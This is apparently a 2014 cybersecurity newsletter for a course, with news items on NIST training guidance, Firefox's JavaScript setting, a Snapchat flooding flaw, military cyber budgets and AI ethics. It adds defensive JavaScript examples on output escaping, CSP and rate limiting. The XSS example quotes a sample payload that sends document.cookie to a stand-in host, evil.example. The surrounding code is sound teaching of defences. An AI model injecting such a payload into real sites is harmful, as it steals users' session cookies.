Center for Cyber Security Studies

February 2014

National Institute of Standards and Technology (NIST) to Update Cyber Education Guidelines

The National Institute of Standards and Technology this spring will unveil updated guidance on role-based cybersecurity training, which will help government agencies as well as private businesses to protect information, NIST Computer Scientist Patricia Toth says. Toth is taking a lead role in developing the guidance, which will be known as Special Publication 800-16 Rev. 1. The guidance will focus on training tied to each individual's role within the organization, teaching them specifically what they need to do to help protect their organization's resources, she says. "One example might be someone who is doing incident response," she says in an interview with Information Security Media Group (transcript below). "They need to know very specifically, when an incident happens, how they need to report it, how they need to respond and what they need to do on their particular system to prevent any further damage." In the interview, Toth discusses: how the new guidance differs from the original document published more than 15 years ago; differences between cybersecurity education and role-based training; and the challenges of determining whether role-based training programs are effective.

Education Tip for SI110: Can't Turn off JavaScript!!! Why?... special thanks to Dr. Dan Roach for this one...

As reported by Dr. Dan Roach (and I use his words here), this might not be labeled as "breaking news", but is probably news to most of us: 4-5 months ago the most recent version of Firefox intentionally made it harder for users to disable JavaScript. You can see it in the official Firefox 23 "release notes", and a "support request" goes into a little more detail. Of note, you can still disable JavaScript using specialized add-ons or by going to the about:config page, but obviously most users will never bother with such things. Dr. Roach writes: "I find this really interesting as an example of the trade-offs between security and usability. The decision has been made that the web is now more or less unusable without client-side scripting. This means we will have to rely on the browser itself to protect users from cross-site scripting (XSS) and other similar attacks, rather than telling users to disable the setting on pages they don't trust."
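As an added example (not from the newsletter, from Dr. Roach, or from Mozilla), here is what "relying on the browser" actually looks like once users can no longer switch scripting off: the page escapes what it renders, and the browser enforces a Content-Security-Policy header the server sends. The attacker payload, the origin names, the policy string and the small CSP evaluator are assumptions for illustration; the evaluator mimics only the script-src decision a browser makes, not the full specification.

```javascript
// Added example: two layers of XSS defence that do not depend on the user's
// JavaScript toggle. Not code from the newsletter or from any browser vendor.
//   1. output encoding in the page (the application's own defence),
//   2. a Content-Security-Policy plus a toy evaluator showing how a
//      CSP-aware browser decides whether a script may run,
//   3. a constructed attacker input pushed through both.
// The evaluator handles only 'self', explicit origins, '*' and
// 'unsafe-inline'; real browsers also handle nonces, hashes, strict-dynamic, ...

const escapeHtml = (s) =>
  String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);

// Vulnerable: untrusted input concatenated straight into markup.
function renderGreetingUnsafe(name) {
  return `<p>Hello, ${name}!</p>`;
}

// Hardened: every interpolated value is HTML-escaped before it reaches the page.
function renderGreetingSafe(name) {
  return `<p>Hello, ${escapeHtml(name)}!</p>`;
}

// Constructed attacker payload, e.g. the value of ?name=... on a reflected endpoint.
const PAYLOAD = '<script>document.location="https://evil.example/?c="+document.cookie</script>';

// Policy the server sends as a response header (assumed): scripts may load only
// from the page's own origin; inline scripts are refused by the browser.
const CSP = "default-src 'self'; script-src 'self'; object-src 'none'";

// Parse "directive src src; directive src" into a Map of directive -> sources.
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name) policy.set(name, sources);
  }
  return policy;
}

// Mimic the browser's decision for one script. `script` is { inline: true }
// or { src: 'https://host/path.js' }; `pageOrigin` is the document's origin.
function scriptAllowed(header, script, pageOrigin) {
  const policy = parseCsp(header);
  const sources = policy.get('script-src') || policy.get('default-src') || ['*'];
  if (script.inline) return sources.includes("'unsafe-inline'");
  const origin = new URL(script.src).origin;
  return sources.some((s) =>
    s === '*' || (s === "'self'" && origin === pageOrigin) || s === origin);
}

// How many real <script> elements ended up in the markup.
function countScriptTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}

function demo() {
  const pageOrigin = 'https://app.example';
  const unsafe = renderGreetingUnsafe(PAYLOAD);
  const safe = renderGreetingSafe(PAYLOAD);
  return {
    unsafeInjects: countScriptTags(unsafe) === 1,   // payload became a live tag
    safeInjects: countScriptTags(safe) === 1,       // escaped: shown as text only
    inlineRunsUnderCsp: scriptAllowed(CSP, { inline: true }, pageOrigin),
    ownScriptRunsUnderCsp: scriptAllowed(CSP, { src: 'https://app.example/main.js' }, pageOrigin),
    thirdPartyRunsUnderCsp: scriptAllowed(CSP, { src: 'https://evil.example/x.js' }, pageOrigin),
  };
}
```

With the unsafe renderer the payload becomes a real script element, yet under the policy above the browser still refuses to execute it because it is inline and the policy grants only 'self'; the escaped renderer never lets the tag form in the first place. Both controls sit on the page and the browser, which is exactly the trade Dr. Roach describes: the user's "disable JavaScript" switch is no longer part of the defence.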

Hackers can use Snapchat to disable iPhones, researcher says

A cyber security researcher has discovered a vulnerability within the Snapchat mobile app that makes it possible for hackers to launch a denial-of-service attack that temporarily freezes a user's iPhone. Jaime Sanchez, who works as a cyber-security consultant for Telefonica, a major telecommunications company in Spain, said he and another researcher found a weakness in Snapchat’s system that allows hackers to send thousands of messages to individual users in a matter of seconds. Sanchez said he and the fellow researcher discovered the glitch on their own time. Flooding one user with so many messages can clog their account to the point that the Snapchat app causes the entire device to freeze and ultimately crash, or require that the user perform a hard reset.
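The flood described above succeeds because nothing between the sender and the victim's handset limits how fast one account can push messages at another. As an added example (not from the article and not Snapchat's code), the following per-sender, per-recipient rate limiter is the server-side check that drops such a burst before it reaches the device. The class name, the limits (30 messages per minute) and the simulated flood are assumptions for illustration; a fixed-window counter is used because it is the simplest shape of the control.

```javascript
// Added example: server-side rate limiting as the mitigation for a
// message-flood denial of service. Not the app's code; names and limits assumed.
// A fixed-window counter keyed on (sender, recipient). Production systems
// usually add per-IP and per-recipient-total limits and a sliding window or
// token bucket, but the shape of the check is the same.

class SenderRateLimiter {
  // At most maxPerWindow messages from one sender to one recipient per windowMs.
  constructor({ maxPerWindow = 30, windowMs = 60000 } = {}) {
    this.maxPerWindow = maxPerWindow;
    this.windowMs = windowMs;
    this.buckets = new Map(); // "sender->recipient" -> { windowStart, count }
  }

  // Returns true if the message may be delivered, false if it must be dropped.
  // `now` is injected (ms) so behaviour is deterministic and testable.
  allow(senderId, recipientId, now = Date.now()) {
    const key = `${senderId}->${recipientId}`;
    const b = this.buckets.get(key);
    if (!b || now - b.windowStart >= this.windowMs) {
      // First message of a new window: reset the counter.
      this.buckets.set(key, { windowStart: now, count: 1 });
      return true;
    }
    if (b.count >= this.maxPerWindow) return false; // window exhausted: drop
    b.count += 1;
    return true;
  }
}

// Constructed flood: one sender fires `n` messages at one recipient spread
// evenly over `spanMs` milliseconds starting at t0. Returns delivery counts.
function simulateFlood({ n, spanMs, limiter, t0 = 0, sender = 'attacker', recipient = 'victim' }) {
  let delivered = 0, dropped = 0;
  for (let i = 0; i < n; i++) {
    const t = t0 + Math.floor((i * spanMs) / n);
    if (limiter.allow(sender, recipient, t)) delivered++; else dropped++;
  }
  return { delivered, dropped };
}

// Thousands of messages in a few seconds: only the first window's quota lands.
function floodScenario() {
  const limiter = new SenderRateLimiter({ maxPerWindow: 30, windowMs: 60000 });
  return simulateFlood({ n: 1000, spanMs: 5000, limiter });
}

// A normal conversation (10 messages over a minute) is untouched.
function normalScenario() {
  const limiter = new SenderRateLimiter({ maxPerWindow: 30, windowMs: 60000 });
  return simulateFlood({ n: 10, spanMs: 60000, limiter, sender: 'alice', recipient: 'bob' });
}
```

The check belongs on the server, not in the app: a client-side limit can be bypassed by anyone who speaks the service's protocol directly, which is precisely how a flood of this kind is generated.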

National Guard Fights for Cyber Role

Chinese and Russian hackers have everybody running scared. So whatever else happens with the president’s budget request for fiscal year 2015, we know it will include more money for things cyber, from purely defensive network security to black-budget “offensive cyber weapons” such as the Stuxnet worm. But one big thing remains in doubt: the role of the National Guard. Cyber Command wants the Guard to help. Guard leaders want to help CYBERCOM. And the Army has at least considered a proposal to fund 390 positions in 10 new “Cyber Protection Teams” to be created in the Army National Guard. Whether this idea will get funded is being wrestled over behind locked doors and in the context of increasingly bitter fights between active-duty and reserve forces. The budgetary question marks loom so large that one senior official at the National Guard Bureau emailed a warning to the Adjutants General, the Guard commanders of every state, territory, and the District of Columbia: Don’t get out in front of what the federal budget will support.

Congress Must Make 'Unimaginable' Defense Budget Choices: HASC's Adam Smith

“I understand that a one percent cut in the COLA is not insubstantial. It is a decrease in what the increase in retirements is going to be,” he said. (Under the plan, benefits would not actually decrease below current levels, they just wouldn’t increase as quickly in the future — and fall behind inflation by certain measures). “If you’re not going to cut this, what are you going to cut?” Activists for veterans and military personnel have argued that changing promised benefits is a breach of faith that will undermine trust in the military and thus people’s willingness to join up and stay in, one reporter noted. “I don’t have sympathy for that argument,” Smith said. “Believe me, I think our military ought to be the best compensated, best taken care of military in the world — and I think it is.” “If we are going to deal [based] on what you were promised when you came in,” Smith said scathingly, “then let’s get rid of the [post-9/11] updated GI bill, let’s get rid of the yearly pay increases, let’s get rid of all the increase in combat pay, let’s get rid of all of the billions, the tens of billions of dollars that we added after you got recruited.”

Cryptography Breakthrough Could Make Software Unhackable

Precisely because of obfuscation's power, many computer scientists, including Amit Sahai of UCLA and his colleagues, thought it was impossible. "We were convinced it was too powerful to exist," he said. Their earliest research findings seemed to confirm this, showing that the most natural form of obfuscation is indeed impossible to achieve for all programs.
Then, on July 20, 2013, Sahai and five co-authors posted a paper on the Cryptology ePrint Archive demonstrating a candidate protocol for a kind of obfuscation known as "indistinguishability obfuscation" (the guarantee is only that the obfuscated forms of any two equal-size programs computing the same function are computationally indistinguishable). Two days later, Sahai and one of his co-authors, Brent Waters, of the University of Texas, Austin, posted a second paper that suggested, together with the first paper, that this somewhat arcane form of obfuscation may possess much of the power cryptographers have dreamed of. "This is the first serious positive result" when it comes to trying to find a universal obfuscator, said Boaz Barak, of Microsoft Research in Cambridge, Mass. "The cryptography community is very excited."

Internet Anti-NSA Protest Starts Tuesday

Circle Feb. 11 on your calendar. You're going to notice something a little different when browsing the Internet that day. Thousands of civil-liberty and online-freedom groups and websites will take to the digital streets next week to wage a coordinated war against the National Security Agency's spying powers, a battle strike reminiscent of a virtual protest that two years ago killed an online piracy bill. Billing the protest as "The Day We Fight Back," organizers are promising banners will be prominently displayed on websites across the Internet urging users to engage in viral activity expressing their opposition to the NSA. Additionally, those banners will ask readers to flood the telephone lines and email in-boxes of congressional offices to voice their support of the Freedom Act, a bill in Congress that aims to restrict the government's surveillance authority. The roster of participating groups, which organizers say now tops 4,000, includes the American Civil Liberties Union, reddit, Tumblr, Mozilla, DailyKos, and Amnesty International.

Nine Factors Creating a ‘Perfect Storm’ Driving the Internet of Things to $14.4 trillion (special thanks to LCDR Connett)

(The article's sections: The Industrial Internet of Things; What role will humans play?; Shifting to Overdrive; Finally ... an example.)

Protests, Blocking Google Buses: What the Hell is Up with Silicon Valley

Silicon Valley can’t afford to ignore its haters. Even just the image of arrogance could kill the industry — and future innovation. Silicon Valley is always selling the next category, the new frontier, the thing you’ll need tomorrow but can’t even imagine wanting today. A computer in your home. The Internet in your pocket. Your music in the cloud. A smartphone on your wrist or face. Unlike any other industry, tech relies on not merely trust but faith that a leap into the unknown, into breaking routines, will be rewarded. Since business models of tech companies are built on monetizing data that users freely supply, losing the trust and optimism of customers wouldn’t just mean failing to sell the next big thing … it could mean failing to make it. Read WIRED editor Bill Wasik’s argument here.

Google's New A.I. Ethics Board... (Fear of the Machine?)

In 2011, the co-founder of DeepMind, the artificial intelligence company acquired this week by Google, made an ominous prediction more befitting a ranting survivalist than an award-winning computer scientist. “Eventually, I think human extinction will probably occur, and technology will likely play a part in this,” DeepMind’s Shane Legg said in an interview with Alexander Kruel. Among all forms of technology that could wipe out the human species, he singled out artificial intelligence, or AI, as the “number 1 risk for this century.” Google’s acquisition of DeepMind came with an estimated $400 million price tag and an unusual stipulation that adds extra gravity -- and a dose of reality -- to Legg’s warning: Google agreed to create an AI safety and ethics review board to ensure this technology is developed safely, as The Information first reported and The Huffington Post confirmed. (A Google spokesman said that DeepMind had been acquired, but declined to comment further.) Even for a company that predictably pursues unpredictable projects (see: Internet-deploying balloons), an AI ethics board marks a surprising first for Google, and has some people questioning why Google is so concerned with the morality of this technology, as opposed to, say, the ethics of reading your email.

Workplace Monitoring... How your boss can keep you on a leash

If you're a person who hates it when your supervisor looks over your shoulder at work, you may want to stop reading this column right now. Because what follows is only going to depress you. Hitachi, the big electronics company based in Japan, is manufacturing and selling to corporations a device intended to increase efficiency in the workplace. It has a rather bland and generic-sounding name: the Hitachi Business Microscope. But what it is capable of doing ... well, just imagine being followed around the office or the factory all day by the snoopiest boss in the world. Even into the restroom. And, the thing is, once you hear about it, you just know that, from a management point of view, it is an innovation of absolute genius. Here's how it works: The device looks like an employee ID badge that most companies issue. Workers are instructed to wear it in the office. Embedded inside each badge, according to Hitachi, are "infrared sensors, an accelerometer, a microphone sensor and a wireless communication device." Hitachi says that the badges record and transmit to management "who talks to whom, how often, where and how energetically." It tracks everything. If you get up to walk around the office a lot, the badge sends information to management about how often you do it, and where you go. If you stop to talk with people throughout the day, the badge transmits who you're talking to (by reading your co-workers' badges), and for how long. Do you contribute at meetings, or just sit there? Either way, the badge tells your bosses.
